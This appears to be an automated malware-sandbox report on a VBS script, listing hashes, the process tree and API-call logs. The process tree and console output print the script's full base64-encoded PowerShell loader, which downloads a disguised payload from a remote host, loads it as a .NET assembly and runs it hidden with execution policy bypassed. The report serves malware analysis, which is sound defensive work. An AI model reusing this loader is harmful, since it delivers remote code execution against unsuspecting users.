Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 1, 2024, 10:56 a.m.	Aug. 1, 2024, 10:58 a.m.

Size	235.5KB
Type	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
MD5	`ed2db1c558d7e56d7d9d67de4d14d60d`
SHA256	`6e5ab717f115b1d2d14ab58ba654af6c65502b7c48c915bf2a36f91159e193bd`
CRC32	`F0A0F1A7`
ssdeep	`1536:kDIYblrExTlFqP0basv5HwIgLpccpBXgGKpehUGwgUUJW4Wrle/PhG+/kery+bGH:kDIpxRUMbwgGKpBGwg8S7Y`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\buttersmoothflowerwayssmooth.gIF.vbs
3040
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABsAGkAbgBrACAAPQAgACcAaAB0AHQAcAA6AC8ALwBzAGUAcgB2AGkAZABvAHIAdwBpAG4AZABvAHcAcwAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvAEYAaQBsAGUAcwAvAHYAYgBzAC4AagBwAGUAZwAnADsAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAHQAcgB5ACAAewAgACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXAHIAaQB0AGUALQBIAG8AcwB0ACAAJwBGAGEAaQBsAGUAZAAgAFQAbwAgAGQAbwB3AG4AbABvAGEAZAAgAGQAYQB0AGEAIABmAHIAbwBtACAAJABsAGkAbgBrACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwBvAGwAbwByACAAUgBlAGQAOwAgAGUAeABpAHQAIAB9ADsAIABpAGYAIAAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACkAOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQBnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZAAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlACcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIAAoACcAdAB4AHQALgBNAE0ATQAvADAAMAA5AC8ANAA1ADEALgA2ADcAMQAuADMALgAyADkAMQAvAC8AOgBwAHQAdABoACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcALAAnAFIAZQBnAEEAcwBtACcALAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwApACkAIAB9ACAAfQA=';$OWjuxD = [system.Text.encoding ]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2196
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
    296

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (10 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 1, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 1, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 1, 2024, 10:56 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 1, 2024, 10:56 a.m.			0	0
IsDebuggerPresent Aug. 1, 2024, 10:56 a.m.			0	0

Command line console output was observed (47 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: Unable to find type [system.Text.encoding ]: make sure that the assembly contai console_handle: 0x00000023	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: ning this type is loaded. console_handle: 0x0000002f	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: At line:1 char:2859 console_handle: 0x0000003b	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: + $Codigo = 'JABsAGkAbgBrACAAPQAgACcAaAB0AHQAcAA6AC8ALwBzAGUAcgB2AGkAZABvAHIAdw console_handle: 0x00000047	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: BpAG4AZABvAHcAcwAuAGQAdQBjAGsAZABuAHMALgBvAHIAZwAvAEYAaQBsAGUAcwAvAHYAYgBzAC4Aa console_handle: 0x00000053	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: gBwAGUAZwAnADsAIAAkAHcAZQBiAEMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQA console_handle: 0x0000005f	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: IABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAgAHQAcgB5ACAAewAgACQ console_handle: 0x0000006b	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: AZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG console_handle: 0x00000077	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: 8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAbABpAG4AawApACAAfQAgAGMAYQB0AGMAaAAgAHsAIABXA console_handle: 0x00000083	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: HIAaQB0AGUALQBIAG8AcwB0ACAAJwBGAGEAaQBsAGUAZAAgAFQAbwAgAGQAbwB3AG4AbABvAGEAZAAg console_handle: 0x0000008f	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: AGQAYQB0AGEAIABmAHIAbwBtACAAJABsAGkAbgBrACcAIAAtAEYAbwByAGUAZwByAG8AdQBuAGQAQwB console_handle: 0x0000009b	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: vAGwAbwByACAAUgBlAGQAOwAgAGUAeABpAHQAIAB9ADsAIABpAGYAIAAoACQAZABvAHcAbgBsAG8AYQ console_handle: 0x000000a7	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: BkAGUAZABEAGEAdABhACAALQBuAGUAIAAkAG4AdQBsAGwAKQAgAHsAIAAkAGkAbQBhAGcAZQBUAGUAe console_handle: 0x000000b3	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: AB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUA console_handle: 0x000000bf	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: VABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAZABvAHcAbgBsAG8AYQBkAGUAZABEAGEAdABhACk console_handle: 0x000000cb	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: AOwAgACQAcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAF console_handle: 0x000000d7	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: QAPgA+ACcAOwAgACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEA console_handle: 0x000000e3	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: D4APgAnADsAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAu console_handle: 0x000000ef	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: AEkAbgBkAGUAeABPAGYAKAAkAHMAdABhAHIAdABGAGwAYQBnACkAOwAgACQAZQBuAGQASQBuAGQAZQB console_handle: 0x000000fb	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: 4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABlAG4AZABGAGwAYQ console_handle: 0x00000107	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: BnACkAOwAgAGkAZgAgACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACAALQBnAGUAIAAwACAALQBhAG4AZ console_handle: 0x00000113	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: AAgACQAZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAAkAHMAdABhAHIAdABJAG4AZABlAHgAKQAgAHsA console_handle: 0x0000011f	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: IAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAArAD0AIAAkAHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4 console_handle: 0x0000012b	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: AZwB0AGgAOwAgACQAYgBhAHMAZQA2ADQATABlAG4AZwB0AGgAIAA9ACAAJABlAG4AZABJAG4AZABlAH console_handle: 0x00000137	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: gAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAIAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuA console_handle: 0x00000143	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: GQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQBy console_handle: 0x0000014f	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: AHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAgACQAYwBvAG0AbQB console_handle: 0x0000015b	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: hAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARg console_handle: 0x00000167	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: ByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZ console_handle: 0x00000173	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: AApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4A console_handle: 0x0000017f	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: UgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8 console_handle: 0x0000018b	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAIAAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAH console_handle: 0x00000197	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: MAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlA console_handle: 0x000001a3	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: CcAKQA7ACAAJABtAGUAdABoAG8AZAAgAD0AIAAkAHQAeQBwAGUALgBHAGUAdABNAGUAdABoAG8AZAAo console_handle: 0x000001af	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: ACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwB console_handle: 0x000001bb	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: dAF0AIAAoACcAdAB4AHQALgBNAE0ATQAvADAAMAA5AC8ANAA1ADEALgA2ADcAMQAuADMALgAyADkAMQ console_handle: 0x000001c7	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: AvAC8AOgBwAHQAdABoACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAc console_handle: 0x000001d3	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: wBhAHQAaQB2AGEAZABvACcAIAAsACAAJwBkAGUAcwBhAHQAaQB2AGEAZABvACcALAAnAFIAZQBnAEEA console_handle: 0x000001df	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: cwBtACcALAAnAGQAZQBzAGEAdABpAHYAYQBkAG8AJwApACkAIAB9ACAAfQA=';$OWjuxD = [system console_handle: 0x000001eb	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: .Text.encoding ] <<<< ::Unicode.GetString([system.Convert]::Frombase64String($C console_handle: 0x000001f7	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: odigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile - console_handle: 0x00000203	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: command $OWjuxD console_handle: 0x0000020f	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: + CategoryInfo : InvalidOperation: (system.Text.encoding :String) console_handle: 0x0000021b	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: [], RuntimeException console_handle: 0x00000227	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: + FullyQualifiedErrorId : TypeNotFound console_handle: 0x00000233	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: Cannot process the command because of a missing parameter. A command must follow -Command. console_handle: 0x0000001f	1	1
WriteConsoleW Aug. 1, 2024, 10:56 a.m.	buffer: PowerShell[.exe] [-PSConsoleFile <file> \| -Version <version>] [-NoLogo] [-NoExit] [-Sta] [-NoProfile] [-NonInteractive] [-InputFormat {Text \| XML}] [-OutputFormat {Text \| XML}] [-WindowStyle <style>] [-EncodedCommand <Base64EncodedCommand>] [-File <filePath> <args>] [-ExecutionPolicy <ExecutionPolicy>] [-Command { - \| <script-block> [-args <arg-array>] \| <string> [<CommandParameters>] } ] PowerShell[.exe] -Help \| -? \| /? -PSConsoleFile Loads the specified Windows PowerShell console file. To create a console file, use Export-Console in Windows PowerShell. -Version Starts the specified version of Windows PowerShell. -NoLogo Hides the copyright banner at startup. -NoExit Does not exit after running startup commands. -Sta Start the shell using a single-threaded apartment. -NoProfile Does not use the user profile. -NonInteractive Does not present an interactive prompt to the user. -InputFormat Describes the format of data sent to Windows PowerShell. Valid values are "Text" (text strings) or "XML" (serialized CLIXML format). -OutputFormat Determines how output from Windows PowerShell is formatted. Valid values are "Text" (text strings) or "XML" (serialized CLIXML format). -WindowStyle Sets the window style to Normal, Minimized, Maximized or Hidden. -EncodedCommand Accepts a base-64-encoded string version of a command. Use this parameter to submit commands to Windows PowerShell that require complex quotation marks or curly braces. -File Execute a script file. -ExecutionPolicy Sets the default execution policy for the session. -Command Executes the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt, and then exits, unless NoExit is specified. The value of Command can be "-", a string. or a script block. If the value of Command is "-", the command text is read from standard input. If the value of Command is a script block, the script block must be enclosed in braces ({}). You can specify a script block only when running PowerShell.exe in Windows PowerShell. The results of the script block are returned to the parent shell as deserialized XML objects, not live objects. If the value of Command is a string, Command must be the last parameter in the command , because any characters typed after the command are interpreted as the command arguments. To write a string that runs a Windows PowerShell command, use the format: "& {<command>}" where the quotation marks indicate a string and the invoke operator (&) causes the command to be executed. -Help, -?, /? Shows this message. If you are typing a PowerShell.exe command in Windows PowerShell, prepend the command parameters with a hyphen (-), not a forward slash (/). You can use either a hyphen or forward slash in Cmd.exe. EXAMPLES PowerShell -PSConsoleFile SqlSnapIn.Psc1 PowerShell -version 1.0 -NoLogo -InputFormat text -OutputFormat XML PowerShell -Command {Get-EventLog -LogName security} PowerShell -Command "& {Get-EventLog -LogName security}" # To use the -EncodedCommand parameter: $command = 'dir "c:\program files" ' $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -encodedCommand $encodedCommand console_handle: 0x0000001f	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 56 events)

Time & API	Arguments	Status	Return
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003507a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350b60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ca0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003510e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003510e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003510e0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350fa0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350ce0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00350d60 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003514a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003514a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003514a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003514a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003514a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x003514a0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00401118 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00401d58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00401d58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00401d58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Aug. 1, 2024, 10:56 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00401a58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
